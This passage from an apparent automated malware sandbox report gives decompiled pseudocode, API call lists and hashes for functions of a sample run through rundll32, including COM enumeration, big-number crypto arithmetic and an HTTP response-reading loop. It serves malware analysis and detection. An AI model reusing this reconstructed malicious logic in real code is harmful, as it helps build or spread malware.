												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x4b3d27c; // 0x1fba5a8
												_t28 = _t108 + 0x4b3e0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x4b3d27c; // 0x1fba5a8
														_t33 = _t78 + 0x4b3e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                  0x04b352fe
                                                  0x04b35307
                                                  0x04b35308
                                                  0x04b3530c
                                                  0x04b35312
                                                  0x04b35318
                                                  0x04b35321
                                                  0x04b35327
                                                  0x04b35331
                                                  0x04b35333
                                                  0x04b35339
                                                  0x04b3533e
                                                  0x04b35349
                                                  0x04b35351
                                                  0x04b35354
                                                  0x04b35477
                                                  0x04b3535a
                                                  0x04b3535a
                                                  0x04b35367
                                                  0x04b3536d
                                                  0x04b35373
                                                  0x04b35377
                                                  0x04b3537d
                                                  0x04b3538a
                                                  0x04b3538e
                                                  0x04b35394
                                                  0x04b35397
                                                  0x04b3539d
                                                  0x04b353a3
                                                  0x04b353a9
                                                  0x04b353ac
                                                  0x04b353af
                                                  0x04b353b5
                                                  0x04b353be
                                                  0x04b353c4
                                                  0x04b353c5
                                                  0x04b353c8
                                                  0x04b353c9
                                                  0x04b353ca
                                                  0x04b353d2
                                                  0x04b353d3
                                                  0x04b353d4
                                                  0x04b353d6
                                                  0x04b353da
                                                  0x04b353de
                                                  0x00000000
                                                  0x00000000
                                                  0x04b353e4
                                                  0x04b353ed
                                                  0x04b353f3
                                                  0x04b353fd
                                                  0x04b35401
                                                  0x04b35403
                                                  0x04b35410
                                                  0x04b35414
                                                  0x04b3541c
                                                  0x04b35421
                                                  0x04b35433
                                                  0x04b35435
                                                  0x04b3543b
                                                  0x04b3543b
                                                  0x04b35444
                                                  0x04b35444
                                                  0x04b35446
                                                  0x04b3544c
                                                  0x04b3544c
                                                  0x04b3544f
                                                  0x04b35455
                                                  0x04b35458
                                                  0x04b35461
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b35461
                                                  0x04b353b5
                                                  0x04b353af
                                                  0x04b35397
                                                  0x04b35467
                                                  0x04b35467
                                                  0x04b3546d
                                                  0x04b3546d
                                                  0x04b35473
                                                  0x04b35473
                                                  0x04b3547c
                                                  0x04b35482
                                                  0x04b35482
                                                  0x04b3533e
                                                  0x04b3548b

                                                  APIs
                                                  • SysAllocString.OLEAUT32(04B3C2B0), ref: 04B35349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04B3542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B35444
                                                  • SysFreeString.OLEAUT32(?), ref: 04B35473
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: 877cb7d1ecd71df45d77503bb404566bfe5b7be4041a5238554caaf417be4517
                                                  • Instruction ID: dfaab2364e9efe158476027757f42e83826d75e24bec99eb6fd529f2b43c5790
                                                  • Opcode Fuzzy Hash: 877cb7d1ecd71df45d77503bb404566bfe5b7be4041a5238554caaf417be4517
                                                  • Instruction Fuzzy Hash: 53516D75D00519EFCB14DFE9C8888AEB7BAEF88706B148589E915EB314D731AD01CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B31017, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E04B31017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04B3A7AA(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04B3968F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04B38967(_t101,  &_v236, _a8, _t96 - _t81);
					E04B38967(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E04B3968F(_t101, 0x4b3d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04B3968F(_a16, _a4);
						E04B31D6C(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04B3B0C8();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04B3B0C2();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04B31FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E04B38B62(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04B39100(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4b3d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                  0x04b3101a
                                                  0x04b31026
                                                  0x04b3102c
                                                  0x04b31031
                                                  0x04b31035
                                                  0x04b31192
                                                  0x04b31196
                                                  0x04b31196
                                                  0x04b3103b
                                                  0x04b3103f
                                                  0x04b31045
                                                  0x04b31046
                                                  0x04b31051
                                                  0x04b31057
                                                  0x04b3105c
                                                  0x04b3105f
                                                  0x04b31079
                                                  0x04b31085
                                                  0x04b3108e
                                                  0x04b31098
                                                  0x04b3109d
                                                  0x04b3109f
                                                  0x04b310a2
                                                  0x04b31150
                                                  0x04b31156
                                                  0x04b31167
                                                  0x04b3117a
                                                  0x04b3118a
                                                  0x00000000
                                                  0x04b3118f
                                                  0x04b310ab
                                                  0x04b310b2
                                                  0x04b310b6
                                                  0x04b310bc
                                                  0x04b310be
                                                  0x04b310c0
                                                  0x04b310c2
                                                  0x04b310c4
                                                  0x04b310ce
                                                  0x04b310d3
                                                  0x04b310d5
                                                  0x04b310d7
                                                  0x04b310d8
                                                  0x04b310d9
                                                  0x04b310da
                                                  0x04b310e1
                                                  0x04b310e8
                                                  0x04b310eb
                                                  0x04b310eb
                                                  0x04b310b8
                                                  0x04b310b8
                                                  0x04b310b8
                                                  0x04b310f3
                                                  0x04b310fb
                                                  0x04b31104
                                                  0x04b31109
                                                  0x04b31109
                                                  0x04b3110e
                                                  0x00000000
                                                  0x00000000
                                                  0x04b31110
                                                  0x04b31113
                                                  0x04b3111d
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3111f
                                                  0x04b3111f
                                                  0x04b31129
                                                  0x04b31109
                                                  0x04b3110e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3110e
                                                  0x04b31133
                                                  0x04b31136
                                                  0x04b31139
                                                  0x04b31140
                                                  0x04b31140
                                                  0x04b3114d
                                                  0x00000000
                                                  0x04b3114d
                                                  0x04b31048
                                                  0x04b3104c
                                                  0x04b3104d
                                                  0x04b3104f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3104f
                                                  0x00000000

                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04B310C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04B310DA
                                                  • memset.NTDLL ref: 04B3117A
                                                  • memset.NTDLL ref: 04B3118A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: 732d570e990842cd061855bffca09ff9b3fac2f9eae35099e7d1462760e3b7b8
                                                  • Instruction ID: 024fa45bd0d960c49c0abe32e841fdd042e2e63d904ac745875e18fce13ec9a4
                                                  • Opcode Fuzzy Hash: 732d570e990842cd061855bffca09ff9b3fac2f9eae35099e7d1462760e3b7b8
                                                  • Instruction Fuzzy Hash: E741B571A00259AFEB10DFAEDC80BEE7779EF44315F1085A9F915AB280DB70BD548B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3A9AB, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 04B3A9BD
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • ResetEvent.KERNEL32(?), ref: 04B3AA31
                                                  • GetLastError.KERNEL32 ref: 04B3AA54
                                                  • GetLastError.KERNEL32 ref: 04B3AAFF
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 8973fdcd4ed5a3627b9488ac42d55bde662da2184ed7900937add47192cee126
                                                  • Instruction ID: 58a6803347cb15a365dd608466876811e8fd3b80fb71b71a443ce72d1ecf4466
                                                  • Opcode Fuzzy Hash: 8973fdcd4ed5a3627b9488ac42d55bde662da2184ed7900937add47192cee126
                                                  • Instruction Fuzzy Hash: FD418E72500604BBDB219FA7CC88E6F7BBDEB49706F10495AF182E2090E771AD55CB30
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B339BF, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E04B339BF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x4b3d134() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x4b3d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E04B32049(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x4b3d134() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E04B39039(_v16);
							if(_t58 == 0) {
								_t58 = E04B37A07(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E04B31C47( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E04B31C47( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                                  0x04b339bf
                                                  0x04b339ce
                                                  0x04b339d3
                                                  0x04b339d5
                                                  0x04b339da
                                                  0x04b339db
                                                  0x04b339e0
                                                  0x04b339e1
                                                  0x04b339ec
                                                  0x04b33a1d
                                                  0x04b33a22
                                                  0x04b33ae5
                                                  0x04b33ae8
                                                  0x04b33aee
                                                  0x04b33aee
                                                  0x04b33a2f
                                                  0x04b33a37
                                                  0x04b33ae2
                                                  0x00000000
                                                  0x04b33ae2
                                                  0x04b33a42
                                                  0x04b33a49
                                                  0x04b33a4c
                                                  0x04b33ad4
                                                  0x04b33ad5
                                                  0x04b33ad5
                                                  0x04b33adb
                                                  0x00000000
                                                  0x04b33adb
                                                  0x04b33a52
                                                  0x04b33a54
                                                  0x04b33a5a
                                                  0x04b33a5b
                                                  0x04b33a5b
                                                  0x04b33a5e
                                                  0x04b33a61
                                                  0x04b33a67
                                                  0x04b33a6c
                                                  0x04b33a6d
                                                  0x04b33a72
                                                  0x04b33a75
                                                  0x04b33a80
                                                  0x00000000
                                                  0x00000000
                                                  0x04b33a88
                                                  0x04b33a90
                                                  0x04b33ab9
                                                  0x04b33abc
                                                  0x04b33ac3
                                                  0x04b33ace
                                                  0x04b33ace
                                                  0x00000000
                                                  0x04b33ac3
                                                  0x04b33a9c
                                                  0x04b33aa0
                                                  0x00000000
                                                  0x00000000
                                                  0x04b33aa2
                                                  0x04b33aa7
                                                  0x00000000
                                                  0x00000000
                                                  0x04b33aa9
                                                  0x04b33aa9
                                                  0x04b33aae
                                                  0x00000000
                                                  0x00000000
                                                  0x04b33ab0
                                                  0x04b33ab1
                                                  0x04b33ab4
                                                  0x04b33ab4
                                                  0x04b33a5b
                                                  0x04b339f4
                                                  0x04b339fc
                                                  0x04b33a15
                                                  0x04b33a17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b33a17
                                                  0x04b33a08
                                                  0x04b33a0c
                                                  0x00000000
                                                  0x00000000
                                                  0x04b33a12
                                                  0x00000000

                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 04B339D5
                                                  • GetLastError.KERNEL32 ref: 04B339EE
                                                    • Part of subcall function 04B31C47: WaitForMultipleObjects.KERNEL32(00000002,04B3AA72,00000000,04B3AA72,?,?,?,04B3AA72,0000EA60), ref: 04B31C62
                                                  • ResetEvent.KERNEL32(?), ref: 04B33A67
                                                  • GetLastError.KERNEL32 ref: 04B33A82
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: 446a5626bea40a3fe5f9b24b811d02c819c0db2868b637e07b47adb9df4a835a
                                                  • Instruction ID: f1a58026fd1676e1f173222f787651733a509c3909ee71eecc558b519ab1aad0
                                                  • Opcode Fuzzy Hash: 446a5626bea40a3fe5f9b24b811d02c819c0db2868b637e07b47adb9df4a835a
                                                  • Instruction Fuzzy Hash: 4831C532A00604ABDB21DFAACC44E6F77F9EF84762F1005A9E955E7190EB30F946DB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B342EA, Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E04B342EA(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x4b3d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4b3d27c; // 0x1fba5a8
				_t3 = _t8 + 0x4b3e862; // 0x61636f4c
				_t25 = 0;
				_t30 = E04B37A9A(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4b3d2a8, 1, 0, _t30);
					E04B39039(_t30);
				}
				_t12 =  *0x4b3d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04B3757F() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04B3205E(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x4b3d0f0( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04B3A501(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                                                  0x04b342eb
                                                  0x04b342f2
                                                  0x04b342fc
                                                  0x04b34300
                                                  0x04b34306
                                                  0x04b34315
                                                  0x04b3431c
                                                  0x04b34320
                                                  0x04b34332
                                                  0x04b34334
                                                  0x04b34334
                                                  0x04b34339
                                                  0x04b34340
                                                  0x04b34395
                                                  0x04b34395
                                                  0x04b3439b
                                                  0x04b3439d
                                                  0x04b3439d
                                                  0x04b343a7
                                                  0x04b343ab
                                                  0x04b343bd
                                                  0x04b343bd
                                                  0x04b343c1
                                                  0x04b343c7
                                                  0x04b343c7
                                                  0x00000000
                                                  0x04b34359
                                                  0x04b3435e
                                                  0x04b34366
                                                  0x04b34368
                                                  0x04b3436c
                                                  0x04b3436c
                                                  0x04b34379
                                                  0x04b3437d
                                                  0x04b34381
                                                  0x04b343d6
                                                  0x04b343dc
                                                  0x04b343dc
                                                  0x04b3438f
                                                  0x04b34393
                                                  0x04b343ca
                                                  0x04b343cc
                                                  0x04b343cf
                                                  0x04b343cf
                                                  0x00000000
                                                  0x04b343cc
                                                  0x04b34393
                                                  0x00000000
                                                  0x04b3437d

                                                  APIs
                                                    • Part of subcall function 04B37A9A: lstrlen.KERNEL32(04B323E9,00000000,00000000,00000027,00000005,00000000,00000000,04B396DA,74666F53,00000000,04B323E9,04B3D00C,?,04B323E9), ref: 04B37AD0
                                                    • Part of subcall function 04B37A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 04B37AF4
                                                    • Part of subcall function 04B37A9A: lstrcat.KERNEL32(00000000,00000000), ref: 04B37AFC
                                                  • CreateEventA.KERNEL32(04B3D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04B33CA0,?,00000001,?), ref: 04B3432B
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,04B33CA0,00000000,00000000,?,00000000,?,04B33CA0,?,00000001,?,?,?,?,04B36880), ref: 04B34389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04B33CA0,?,00000001,?), ref: 04B343B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04B33CA0,?,00000001,?,?,?,?,04B36880), ref: 04B343CF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 985c689e3e4a589d51bc399291083000ab714a773a19bf8cb07df108bbf8479e
                                                  • Instruction ID: 07eff6a3b84e1a3b9802467b77bad9ae703d3e181cd624409b5a31c6b730da39
                                                  • Opcode Fuzzy Hash: 985c689e3e4a589d51bc399291083000ab714a773a19bf8cb07df108bbf8479e
                                                  • Instruction Fuzzy Hash: 0B21E132500251ABD7319FBB9C84B6F77A9EF88B13F1506B6FA51EB140DB75EC0186A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3A0B2, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 38%
                                                  			E04B3A0B2(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x4b3d144; // 0x4b3ad81
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04B32049(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E04B39039(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04B31C47( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                  0x04b3a0b2
                                                  0x04b3a0b2
                                                  0x04b3a0bc
                                                  0x04b3a0c2
                                                  0x04b3a0c5
                                                  0x04b3a0c9
                                                  0x04b3a0d1
                                                  0x04b3a0d4
                                                  0x04b3a0ed
                                                  0x04b3a0f0
                                                  0x04b3a0f4
                                                  0x04b3a0f8
                                                  0x04b3a0f9
                                                  0x04b3a0fe
                                                  0x04b3a101
                                                  0x04b3a108
                                                  0x04b3a10f
                                                  0x04b3a162
                                                  0x04b3a16b
                                                  0x04b3a16e
                                                  0x04b3a1a9
                                                  0x04b3a1af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3a16e
                                                  0x04b3a115
                                                  0x00000000
                                                  0x04b3a11c
                                                  0x04b3a12a
                                                  0x04b3a12d
                                                  0x04b3a130
                                                  0x04b3a13c
                                                  0x04b3a140
                                                  0x04b3a1a2
                                                  0x04b3a142
                                                  0x04b3a145
                                                  0x04b3a149
                                                  0x04b3a14a
                                                  0x04b3a14b
                                                  0x04b3a14d
                                                  0x04b3a154
                                                  0x04b3a192
                                                  0x04b3a19d
                                                  0x04b3a156
                                                  0x04b3a159
                                                  0x04b3a15d
                                                  0x04b3a15d
                                                  0x04b3a154
                                                  0x00000000
                                                  0x04b3a140
                                                  0x04b3a115
                                                  0x04b3a0d9
                                                  0x04b3a0df
                                                  0x04b3a0e4
                                                  0x04b3a0e7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3a177
                                                  0x04b3a17f
                                                  0x04b3a186
                                                  0x04b3a186
                                                  0x00000000

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 04B3A0C9
                                                  • SetEvent.KERNEL32(?), ref: 04B3A0D9
                                                  • GetLastError.KERNEL32 ref: 04B3A162
                                                    • Part of subcall function 04B31C47: WaitForMultipleObjects.KERNEL32(00000002,04B3AA72,00000000,04B3AA72,?,?,?,04B3AA72,0000EA60), ref: 04B31C62
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  • GetLastError.KERNEL32(00000000), ref: 04B3A197
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
